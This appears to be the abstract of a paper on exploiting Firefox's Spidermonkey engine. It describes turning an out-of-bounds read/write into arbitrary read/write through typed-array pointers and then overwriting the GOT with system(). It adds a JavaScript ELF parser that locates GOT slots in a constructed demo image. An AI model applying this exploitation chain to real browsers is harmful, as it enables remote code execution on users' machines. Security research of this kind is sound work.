In this
paper, I present a set of techniques that enable command execution within the
Spidermonkey JS engine given a relative read/write (rw) bug, that is, an
out-of-bounds (OOB) read or write at a controlled offset from a known base. I
will discuss how to convert a relative rw primitive into an arbitrary rw
primitive by overwriting the backing-store pointer of a JavaScript typed array.
From an arbitrary rw primitive I gain command execution by overwriting an entry
in the Global Offset Table (GOT) with a pointer to libc's system() function.
Finally, I demonstrate how to determine the GOT offsets by implementing an ELF
parser within the JavaScript exploit code that walks the in-memory Spidermonkey
ELF image.
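The last step of the abstract, locating GOT slots by parsing the loaded ELF image from JavaScript, is shown below as an added example; it is not the paper's own code. A real exploit would back the `u8`/`u16`/`u32`/`u64` reads with the hijacked typed array (the arbitrary read primitive), whereas here they read a small constructed ELF64 image at an assumed load address `BASE`. Because section headers are not mapped at runtime, the parser walks the program headers to `PT_DYNAMIC`, then follows `DT_SYMTAB`, `DT_STRTAB` and `DT_JMPREL` to the PLT relocations, whose `r_offset` is the GOT slot of each imported function. The `fix()` heuristic (add the base only to values that still look unrelocated) is an assumption: glibc rewrites several `d_ptr` values in place at load time, so a parser must tolerate both relocated and link-time values.

```javascript
// Added example: find the GOT slot of an imported symbol by parsing an in-memory
// ELF64 image through an arbitrary-read interface. The image and BASE below are
// constructed for demonstration; they are not the real Spidermonkey binary.
const ELF_MAGIC = [0x7f, 0x45, 0x4c, 0x46];
const PT_DYNAMIC = 2;
const DT_NULL = 0, DT_PLTRELSZ = 2, DT_STRTAB = 5, DT_SYMTAB = 6, DT_JMPREL = 23;
const SYM_SIZE = 24n, RELA_SIZE = 24n, DYN_SIZE = 16n;

// Stand-in for the arbitrary-read primitive: reads come from `image`, which is
// pretended to be mapped at `base`. Reads outside the image throw instead of
// returning garbage, which is what you want while debugging an exploit.
function makeReader(image, base) {
  const dv = new DataView(image.buffer, image.byteOffset, image.byteLength);
  const off = (addr) => {
    const o = Number(addr - base);
    if (o < 0 || o >= image.length) throw new RangeError(`read outside image: 0x${addr.toString(16)}`);
    return o;
  };
  return {
    u8:  (a) => dv.getUint8(off(a)),
    u16: (a) => dv.getUint16(off(a), true),
    u32: (a) => dv.getUint32(off(a), true),
    u64: (a) => dv.getBigUint64(off(a), true),
  };
}

function readCString(mem, addr, max = 256) {
  let s = '';
  for (let i = 0n; i < BigInt(max); i++) {
    const c = mem.u8(addr + i);
    if (c === 0) return s;
    s += String.fromCharCode(c);
  }
  throw new Error('unterminated string');
}

// Returns the absolute address of the GOT slot for `symbol`, or null if the
// symbol has no PLT relocation in this image.
function findGotSlot(mem, base, symbol) {
  for (let i = 0; i < 4; i++) if (mem.u8(base + BigInt(i)) !== ELF_MAGIC[i]) throw new Error('not an ELF image');
  if (mem.u8(base + 4n) !== 2 || mem.u8(base + 5n) !== 1) throw new Error('expected ELF64 little-endian');
  const phoff = mem.u64(base + 32n);               // e_phoff
  const phentsize = BigInt(mem.u16(base + 54n));   // e_phentsize
  const phnum = mem.u16(base + 56n);               // e_phnum
  let dyn = null;
  for (let i = 0; i < phnum; i++) {                // find PT_DYNAMIC via p_vaddr
    const ph = base + phoff + BigInt(i) * phentsize;
    if (mem.u32(ph) === PT_DYNAMIC) { dyn = base + mem.u64(ph + 16n); break; }
  }
  if (dyn === null) throw new Error('no PT_DYNAMIC program header');
  const tags = {};
  for (let e = dyn, n = 0; n < 64; e += DYN_SIZE, n++) {
    const tag = Number(mem.u64(e));
    if (tag === DT_NULL) break;
    tags[tag] = mem.u64(e + 8n);
  }
  for (const t of [DT_SYMTAB, DT_STRTAB, DT_JMPREL, DT_PLTRELSZ]) {
    if (tags[t] === undefined) throw new Error(`missing dynamic tag ${t}`);
  }
  // Heuristic (assumption): d_ptr/r_offset values below the base are link-time
  // vaddrs of a PIE and need the base added; values above it were already relocated.
  const fix = (v) => (v < base ? v + base : v);
  const symtab = fix(tags[DT_SYMTAB]), strtab = fix(tags[DT_STRTAB]), jmprel = fix(tags[DT_JMPREL]);
  for (let r = jmprel; r < jmprel + tags[DT_PLTRELSZ]; r += RELA_SIZE) {
    const symIdx = mem.u64(r + 8n) >> 32n;         // ELF64_R_SYM(r_info)
    const nameOff = mem.u32(symtab + symIdx * SYM_SIZE);  // st_name
    if (readCString(mem, strtab + BigInt(nameOff)) === symbol) return fix(mem.u64(r));  // r_offset
  }
  return null;
}

// Constructed minimal PIE image: header, one PT_DYNAMIC phdr, .dynstr, .dynsym,
// .rela.plt (JUMP_SLOT entries for puts and system) and .dynamic; GOT at 0x300.
function buildImage() {
  const img = new Uint8Array(0x310);
  const dv = new DataView(img.buffer);
  const u8 = (o, v) => dv.setUint8(o, v), u16 = (o, v) => dv.setUint16(o, v, true);
  const u32 = (o, v) => dv.setUint32(o, v, true), u64 = (o, v) => dv.setBigUint64(o, BigInt(v), true);
  img.set(ELF_MAGIC, 0); u8(4, 2); u8(5, 1);      // ELF64, little-endian
  u16(16, 3); u64(32, 0x40); u16(54, 56); u16(56, 1);  // ET_DYN, e_phoff, e_phentsize, e_phnum
  u32(0x40, PT_DYNAMIC); u64(0x40 + 16, 0x140);   // PT_DYNAMIC, p_vaddr
  img.set(new TextEncoder().encode('\0puts\0system\0'), 0x80);   // .dynstr: puts@1, system@6
  u32(0xa0 + 24, 1); u32(0xa0 + 48, 6);           // .dynsym[1].st_name, .dynsym[2].st_name
  u64(0x100, 0x300); u64(0x108, (1n << 32n) | 7n);   // rela[0]: GOT 0x300 <- sym 1 (puts)
  u64(0x118, 0x308); u64(0x120, (2n << 32n) | 7n);   // rela[1]: GOT 0x308 <- sym 2 (system)
  [[DT_STRTAB, 0x80], [DT_SYMTAB, 0xa0], [DT_JMPREL, 0x100], [DT_PLTRELSZ, 48], [DT_NULL, 0]]
    .forEach(([t, v], i) => { u64(0x140 + i * 16, t); u64(0x148 + i * 16, v); });
  return img;
}

const BASE = 0x7f3a12340000n;                      // assumed load address of the image
const mem = makeReader(buildImage(), BASE);
const slot = findGotSlot(mem, BASE, 'system');
console.log(`GOT slot for system: 0x${slot.toString(16)}`);
```

The same routine serves both halves of the technique: the slot of an already-resolved import leaks a libc pointer when read, and the slot of a function the engine calls with attacker-controlled data is where the address of system() is written.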
Firefox Spidermonkey JS Engine Exploitation